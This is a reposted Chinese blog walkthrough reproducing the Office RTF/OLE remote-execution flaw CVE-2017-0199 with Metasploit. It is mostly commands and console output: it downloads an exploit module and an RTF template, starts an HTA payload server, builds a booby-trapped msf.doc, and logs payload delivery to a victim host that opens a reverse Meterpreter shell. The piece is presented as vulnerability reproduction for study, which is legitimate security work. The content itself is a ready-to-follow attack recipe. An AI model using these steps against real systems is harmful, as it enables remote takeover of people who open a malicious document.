cve-2017-0199&metasploit復現過程

本文轉載自查看原文 2017-05-03 00:56 4366 漏洞復現

CVE-2017-0199 WORD/RTF嵌入OLE調用遠程文件執行的一個漏洞。不需要用戶交互。打開文檔即中招

首先更新msf到最新,據說最新版簡化了利用過程,不需要開啟hta這一步.但沒測成功還是按老方法

更新msf,增加國內源

 1 #清華大學
 2 #deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
 3 #deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free
 4 
 5 #浙大
 6 #deb http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free
 7 #deb-src http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free
 8 
 9 #東軟大學
10 #deb http://mirrors.neusoft.edu.cn/kali kali-rolling/main non-free contrib
11 #deb-src http://mirrors.neusoft.edu.cn/kali kali-rolling/main non-free contrib
12 
13 #官方源
14 #deb http://http.kali.org/kali kali-rolling main non-free contrib
15 #deb-src http://http.kali.org/kali kali-rolling main non-free contrib

沒用阿里雲的是因為用阿里雲的源更新時,提示hash校驗失敗.

1 apt-get clean && apt-get update -y && apt-get -f upgrade -y
2 msfupdate

下載對應exploit

1 cd /usr/share/metasploit-framework/modules/exploits/windows/fileformat
2 wget https://raw.githubusercontent.com/nixawk/metasploit-framework/feature/CVE-2017-0199/modules/exploits/windows/fileformat/office_word_hta.rb

下載cve-2017-0199.rtf:

1 cd /usr/share/metasploit-framework/data/exploits
2 wget https://raw.githubusercontent.com/nixawk/metasploit-framework/feature/CVE-2017-0199/data/exploits/cve-2017-0199.rtf

開啟HTA:

 1 root@kali:~# msfconsole
 2                                                   
 3      ,           ,
 4     /             \
 5    ((__---,,,---__))
 6       (_) O O (_)_________
 7          \ _ /            |\
 8           o_o \   M S F   | \
 9                \   _____  |  *
10                 |||   WW|||
11                 |||     |||
12 
13 
14 Tired of typing 'set RHOSTS'? Click & pwn with Metasploit Pro
15 Learn more on http://rapid7.com/metasploit
16 
17        =[ metasploit v4.14.14-dev                         ]
18 + -- --=[ 1642 exploits - 945 auxiliary - 289 post        ]
19 + -- --=[ 473 payloads - 40 encoders - 9 nops             ]
20 + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
21 
22 msf > use exploit/windows/misc/hta_server 
23 msf exploit(hta_server) > show options 
24 
25 Module options (exploit/windows/misc/hta_server):
26 
27    Name     Current Setting  Required  Description
28    ----     ---------------  --------  -----------
29    SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
30    SRVPORT  8080             yes       The local port to listen on.
31    SSL      false            no        Negotiate SSL for incoming connections
32    SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
33    URIPATH                   no        The URI to use for this exploit (default is random)
34 
35 
36 Exploit target:
37 
38    Id  Name
39    --  ----
40    0   Powershell x86
41 
42 
43 msf exploit(hta_server) > run
44 [*] Exploit running as background job.
45 
46 [*] Started reverse TCP handler on 192.168.1.101:4444 
47 [*] Using URL: http://0.0.0.0:8080/h48EGx964y.hta
48 [*] Local IP: http://192.168.1.101:8080/h48EGx964y.hta
49 [*] Server started.
50 msf exploit(hta_server) > use exploit/windows/fileformat/office_word_hta
51 msf exploit(office_word_hta) > show options 
52 
53 Module options (exploit/windows/fileformat/office_word_hta):
54 
55    Name       Current Setting              Required  Description
56    ----       ---------------              --------  -----------
57    FILENAME                                no        The file name.
58    TARGETURI  http://example.com/test.rtf  yes       The path to a online hta file.
59 
60 
61 Exploit target:
62 
63    Id  Name
64    --  ----
65    0   Microsoft Office Word

生成payload doc文檔:

 1 msf exploit(office_word_hta) > set TARGETURI http://192.168.1.101:8080/h48EGx964y.hta
 2 TARGETURI => http://192.168.1.101:8080/h48EGx964y.hta
 3 msf exploit(office_word_hta) > set FILENAME msf.doc
 4 FILENAME => msf.doc
 5 msf exploit(office_word_hta) > run
 6 
 7 [+] msf.doc stored at /root/.msf4/local/msf.doc
 8 msf exploit(office_word_hta) > 
 9 msf exploit(office_word_hta) > 
10 msf exploit(office_word_hta) > 
11 msf exploit(office_word_hta) > 
12 msf exploit(office_word_hta) > 
13 msf exploit(office_word_hta) > 
14 msf exploit(office_word_hta) > 
15 
16 msf exploit(office_word_hta) > 
17 msf exploit(office_word_hta) > 
18 msf exploit(office_word_hta) > 
19 msf exploit(office_word_hta) > 
20 msf exploit(office_word_hta) > 
21 msf exploit(office_word_hta) > 
22 [*] 192.168.1.108    hta_server - Delivering Payload
23 [*] 192.168.1.108    hta_server - Delivering Payload
24 [*] Sending stage (957487 bytes) to 192.168.1.108
25 [*] Meterpreter session 1 opened (192.168.1.101:4444 -> 192.168.1.108:11021) at 2017-05-03 00:30:58 +0800
26 
27 msf exploit(office_word_hta) > sessions -i
28 
29 Active sessions
30 ===============
31 
32   Id  Type                     Information       Connection
33   --  ----                     -----------       ----------
34   1   meterpreter x86/windows  FEIYU\yu @ FEIYU  192.168.1.101:4444 -> 192.168.1.108:11021 (192.168.1.108)
35 
36 msf exploit(office_word_hta) > session 1
37 [-] Unknown command: session.
38 msf exploit(office_word_hta) > sessions -i 1
39 [*] Starting interaction with 1...

去目標機上看下:

需要注意的是,不是所有版本都支持,比如我的office plus 2013

免責聲明！

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 Office遠程代碼執行漏洞CVE-2017-0199復現 windows 10上利用Microsoft RTF文件（CVE-2017-0199）進行攻擊 CVE-2017-12617 漏洞復現 CVE-2017-0213漏洞復現 Weblogic(CVE-2017-10271)漏洞復現 CVE-2017-11610漏洞復現 CVE-2017-3248簡單復現 CVE-2017-8046 復現與分析 CVE-2017-12615漏洞復現 Vulhub漏洞CVE-2017-10271復現